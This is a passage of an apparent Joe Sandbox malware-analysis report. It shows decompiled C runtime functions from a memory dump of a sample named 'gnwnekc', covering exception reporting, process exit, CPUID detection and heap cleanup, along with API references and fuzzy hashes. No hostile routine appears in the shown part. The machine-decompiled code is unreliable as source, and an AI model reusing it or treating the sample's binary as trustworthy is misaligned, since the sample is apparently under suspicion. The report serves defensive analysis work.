				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E004017EB(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00402060(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00402060(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E004017EB(_t49);
				}
				return _t49;
			}

0x00401846
0x00401846
0x00401846
0x0040185a
0x0040185c
0x0040185f
0x0040185f
0x00401863
0x00401868
0x00401880
0x00401886
0x0040188c
0x00401892
0x00401898
0x0040189e
0x004018a4
0x004018ab
0x004018b2
0x004018b9
0x004018c0
0x004018c7
0x004018ce
0x004018cf
0x004018d8
0x004018de
0x004018e1
0x004018e7
0x004018f6
0x00401902
0x0040190d
0x00401914
0x0040191b
0x00401926
0x0040192e
0x00401937
0x00401939
0x0040193c
0x0040193e
0x00401948
0x00401950
0x00401956
0x00000000
0x0040195d
0x00401960

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401852
IsDebuggerPresent.KERNEL32 ref: 0040191E
SetUnhandledExceptionFilter.KERNEL32 ref: 0040193E
UnhandledExceptionFilter.KERNEL32(?), ref: 00401948

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 22ed9e3d5f1ad05360bad406297224c8d0f5709dcae853a40fed1a2fd8c385df
Instruction ID: 536895816315d71129c12b62b647cc8f3f8674ac1cab19154c642890ed1cf56c
Opcode Fuzzy Hash: 22ed9e3d5f1ad05360bad406297224c8d0f5709dcae853a40fed1a2fd8c385df
Instruction Fuzzy Hash: 523109B5D4121C9BDB10DFA5D9897CDBBF8BF08704F1040AAE409A7290EB755B85CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00405CCC Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00405CCC(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x416010; // 0x2fe432c7
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E004017EB(_t41);
					_pop(_t61);
				}
				E00402060(_t66,  &_v804, 0, 0x50);
				E00402060(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E004017EB(_t57);
				}
				return E00401C35(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00405ccc
0x00405ccc
0x00405ccc
0x00405cd7
0x00405cdc
0x00405cde
0x00405ce6
0x00405ce8
0x00405ceb
0x00405cf0
0x00405cf0
0x00405cfc
0x00405d0f
0x00405d1d
0x00405d23
0x00405d29
0x00405d2f
0x00405d35
0x00405d3b
0x00405d41
0x00405d47
0x00405d4d
0x00405d53
0x00405d5a
0x00405d61
0x00405d68
0x00405d6f
0x00405d76
0x00405d7d
0x00405d7e
0x00405d87
0x00405d8d
0x00405d90
0x00405d96
0x00405da3
0x00405dac
0x00405db5
0x00405dbe
0x00405dcc
0x00405dce
0x00405de3
0x00405def
0x00405df2
0x00405df7
0x00405e04

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00405DC4
SetUnhandledExceptionFilter.KERNEL32 ref: 00405DCE
UnhandledExceptionFilter.KERNEL32(?), ref: 00405DDB

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 81c7998c50bfda22bc4fd0442a2144899bf39bd1d1f73a667200768142f11ab4
Instruction ID: 41bb7fde86f5f5366bdabee6e1f4e8e5423c3383c32b50633b8d3b0eb17b1604
Opcode Fuzzy Hash: 81c7998c50bfda22bc4fd0442a2144899bf39bd1d1f73a667200768142f11ab4
Instruction Fuzzy Hash: C731C47494122D9BCB21DF65D989BCDBBB4BF08310F5081EAE41CA7290EB749B819F49

Uniqueness

Uniqueness Score: -1.00%

Function 004024C4 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004024C4(int _a4) {
				void* _t14;

				if(E00406682(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00402471(_t14, _a4);
				ExitProcess(_a4);
			}

0x004024d1
0x004024ed
0x004024ed
0x004024f6
0x004024ff

APIs

GetCurrentProcess.KERNEL32(?,?,0040257C,?,?,?,?,?,0040A726), ref: 004024E6
TerminateProcess.KERNEL32(00000000,?,0040257C,?,?,?,?,?,0040A726), ref: 004024ED
ExitProcess.KERNEL32 ref: 004024FF

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3285a83a70af6310e99d919453954666ec4186d018ce3a22b95662c082cd36f4
Instruction ID: 4dd0398f47760abb4c4626cbb4a250ab0b1f73ba368d45705e68e63771d85bd0
Opcode Fuzzy Hash: 3285a83a70af6310e99d919453954666ec4186d018ce3a22b95662c082cd36f4
Instruction Fuzzy Hash: D7E08C31100148AFCF112FA4DE0CE893F68FB80341B018439FC19962B1CB79EE42EB88

Uniqueness

Uniqueness Score: -1.00%

Function 00401A55 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401A55(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x416900 =  *0x416900 & 0x00000000;
				 *0x416018 =  *0x416018 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x416904; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x416904 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x416018; // 0x2f
					_t62 = _t61 | 0x00000002;
					 *0x416900 = 1;
					 *0x416018 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x416900 = 2;
						 *0x416018 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x416018; // 0x2f
								_t67 = _t66 | 0x00000008;
								 *0x416900 = 3;
								 *0x416018 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x416900 = 5;
									 *0x416018 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x416018 =  *0x416018 | 0x00000040;
										 *0x416900 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x416904; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x416904 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00401a55
0x00401a58
0x00401a62
0x00401a73
0x00401c25
0x00401c28
0x00401c28
0x00401a79
0x00401a7f
0x00401a84
0x00401a88
0x00401a8c
0x00401a8e
0x00401a90
0x00401a93
0x00401a98
0x00401aa1
0x00401ab2
0x00401abd
0x00401ac3
0x00401ac4
0x00401aca
0x00401acd
0x00401ad7
0x00401ada
0x00401add
0x00401ae0
0x00401b25
0x00401b25
0x00401b2b
0x00401b2b
0x00401b30
0x00401b31
0x00401b37
0x00401b69
0x00401b39
0x00401b3b
0x00401b3c
0x00401b42
0x00401b45
0x00401b47
0x00401b4a
0x00401b4d
0x00401b50
0x00401b53
0x00401b5c
0x00401b61
0x00401b61
0x00401b5c
0x00401b6c
0x00401b71
0x00401b74
0x00401b7e
0x00401b89
0x00401b8f
0x00401b92
0x00401b9c
0x00401ba7
0x00401bb3
0x00401bb6
0x00401bb9
0x00401bc4
0x00401bc9
0x00401bcb
0x00401bd0
0x00401bd3
0x00401bdd
0x00401be5
0x00401bea
0x00401bf4
0x00401c02
0x00401c15
0x00401c1c
0x00401c1c
0x00401c02
0x00401be5
0x00401bc9
0x00401ba7
0x00000000
0x00401c24
0x00401ae5
0x00401aef
0x00401b14
0x00401b1a
0x00401b1d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00401A6B

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 94f87a532c1cd989e0d7185242afe8950377e22082cf9ee3c27cbed9b40066c9
Instruction ID: ea939e6a5a8f5ddbb9d7f8497d5570ad1f16d83c168e7133f8d2e31cd079a229
Opcode Fuzzy Hash: 94f87a532c1cd989e0d7185242afe8950377e22082cf9ee3c27cbed9b40066c9
Instruction Fuzzy Hash: A2512EB1A152058BEB24CF54D8857AABBF4FB48314F25C47AD405EB3A0D378EA44CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404C25 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C25() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x417154 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00404c25
0x00404c2d
0x00404c35

APIs

GetProcessHeap.KERNEL32 ref: 00404C25

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1eef255f8ddc1ff6985c8ae0b6e9ff3f9afb23c2717e789d0a5fb1cbb54fa680
Instruction ID: 54e667f0bbe0340bd93cc44d0ba6ff42724dfd7de29d665197021c9af97f8ead
Opcode Fuzzy Hash: 1eef255f8ddc1ff6985c8ae0b6e9ff3f9afb23c2717e789d0a5fb1cbb54fa680
Instruction Fuzzy Hash: 65A011303022008B83008F30AB082883AA8AA82282B0080B8A808C0220EB3880008A08

Uniqueness

Uniqueness Score: -1.00%

Function 003C017B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction ID: c27269236afa132ffb4979c49d4b6b1d7082c9bf4198c82b802e859842f56007
Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction Fuzzy Hash: E1117C3A600159EFDB21EF69C884EAAF7E9EF547A4705801AFC55CB210E734EE81C794

Uniqueness

Uniqueness Score: -1.00%

Function 003C013E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction ID: dee0db6ca831d52d4dbb075273c1fbc1a2ca2bc61267309c7d0c862dd9febc3e
Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction Fuzzy Hash: 05E01239664589EFD745CFACCD41E55B3F8EB09320B154294F915C73A1E634EE00D750

Uniqueness

Uniqueness Score: -1.00%

Function 003C0109 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction ID: 573f797de0f4193320bb3b939129d2d2a4539f00ea26fe41ae2580c2a74a21aa
Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction Fuzzy Hash: A5E04F3A210694DBC7669B59C840E96F7E8EB887B0B4E4429ED49D7610C230FC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00406682 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00406682(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E004049AD(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x0040668f
0x00406691
0x00406694
0x00406697
0x0040669a
0x004066ab
0x004066ad
0x0040669c
0x004066a0
0x004066a9
0x00000000
0x00000000
0x004066a9
0x004066b2

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862135ce28260289e7d24aee297df8a07c088d61f08c174d5294a72087457a46
Instruction ID: 4fd6a78b9e80d3063a38da77aae0cc8de08af5c73220681faeb57ba82f2ab12c
Opcode Fuzzy Hash: 862135ce28260289e7d24aee297df8a07c088d61f08c174d5294a72087457a46
Instruction Fuzzy Hash: 64E08672911128EBCB14DB99C90494AF3ECEB44B04B11046BB501E3180C279DE10CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 003C005F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00407014 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00407014(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x416708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00405BB5(_t46);
							E004066B3( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00405BB5(_t47);
							E004067B1( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00405BB5( *((intOrPtr*)(_t74 + 0x7c)));
						E00405BB5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00405BB5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00405BB5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00405BB5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00405BB5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004071AE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x416650) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00405BB5(_t31);
							E00405BB5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00405BB5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00405BB5(_t74);
			}

0x0040701c
0x00407020
0x00407028
0x00407031
0x00407036
0x0040703d
0x00407045
0x0040704d
0x00407058
0x0040705e
0x0040705f
0x00407067
0x0040706f
0x0040707a
0x00407080
0x00407084
0x0040708f
0x00407095
0x00407036
0x00407096
0x0040709e
0x004070b1
0x004070c4
0x004070d2
0x004070dd
0x004070e2
0x004070eb
0x004070f3
0x004070f4
0x004070fa
0x004070fd
0x00407100
0x00407107
0x00407109
0x0040710d
0x00407115
0x0040711c
0x00407122
0x00407123
0x00407123
0x0040712a
0x0040712c
0x00407131
0x00407139
0x0040713e
0x0040713f
0x0040713f
0x00407142
0x00407145
0x00407148
0x0040714b
0x0040714b
0x0040715b

APIs

___free_lconv_mon.LIBCMT ref: 00407058

Part of subcall function 004066B3: _free.LIBCMT ref: 004066D0
Part of subcall function 004066B3: _free.LIBCMT ref: 004066E2
Part of subcall function 004066B3: _free.LIBCMT ref: 004066F4
Part of subcall function 004066B3: _free.LIBCMT ref: 00406706
Part of subcall function 004066B3: _free.LIBCMT ref: 00406718
Part of subcall function 004066B3: _free.LIBCMT ref: 0040672A
Part of subcall function 004066B3: _free.LIBCMT ref: 0040673C
Part of subcall function 004066B3: _free.LIBCMT ref: 0040674E
Part of subcall function 004066B3: _free.LIBCMT ref: 00406760
Part of subcall function 004066B3: _free.LIBCMT ref: 00406772
Part of subcall function 004066B3: _free.LIBCMT ref: 00406784
Part of subcall function 004066B3: _free.LIBCMT ref: 00406796
Part of subcall function 004066B3: _free.LIBCMT ref: 004067A8

_free.LIBCMT ref: 0040704D

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 0040706F
_free.LIBCMT ref: 00407084
_free.LIBCMT ref: 0040708F
_free.LIBCMT ref: 004070B1
_free.LIBCMT ref: 004070C4
_free.LIBCMT ref: 004070D2
_free.LIBCMT ref: 004070DD
_free.LIBCMT ref: 00407115
_free.LIBCMT ref: 0040711C
_free.LIBCMT ref: 00407139
_free.LIBCMT ref: 00407151

Strings

PfA, xrefs: 00407100

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: PfA
API String ID: 161543041-2709604997
Opcode ID: a212ad714cfad8f1f1852c3c08f8bdaf6a751003fef6f57651717f40732b0156
Instruction ID: 249740d5b99519921bff886f7caa4ebcd0f9be59e2d2d63c2f372444e690fca9
Opcode Fuzzy Hash: a212ad714cfad8f1f1852c3c08f8bdaf6a751003fef6f57651717f40732b0156
Instruction Fuzzy Hash: DE314A31A046009FEB31AA39D845B5773E9EF00314F10497BE495EA3D1EEBDB9818A1A

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407DB3(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v0;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t46;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t56;
				void* _t57;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t74;
				signed int _t79;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				void* _t99;
				signed int _t100;
				signed int _t101;
				void* _t105;
				signed int _t108;
				signed int _t110;
				void* _t111;
				signed int _t113;
				signed int _t117;
				signed int _t118;
				WCHAR* _t119;
				void* _t120;
				void* _t122;
				void* _t125;
				void* _t126;

				_t122 = _t120;
				_push(_t122);
				_t126 = _t125 - 0x10;
				_push(__ebx);
				_t87 = _a4;
				_t129 = _t87;
				if(_t87 != 0) {
					_push(__esi);
					_push(__edi);
					_t113 = _t87;
					_t46 = E0040B15C(_t87, 0x3d);
					_v20 = _t46;
					__eflags = _t46;
					if(__eflags == 0) {
						L39:
						 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
						goto L40;
					} else {
						__eflags = _t46 - _t87;
						if(__eflags == 0) {
							goto L39;
						} else {
							_t50 =  *(_t46 + 2) & 0x0000ffff;
							_v24 = _t50;
							_v16 = _t50;
							L44();
							_t117 =  *0x416e90; // 0x282e58
							_t88 = 0;
							__eflags = _t117;
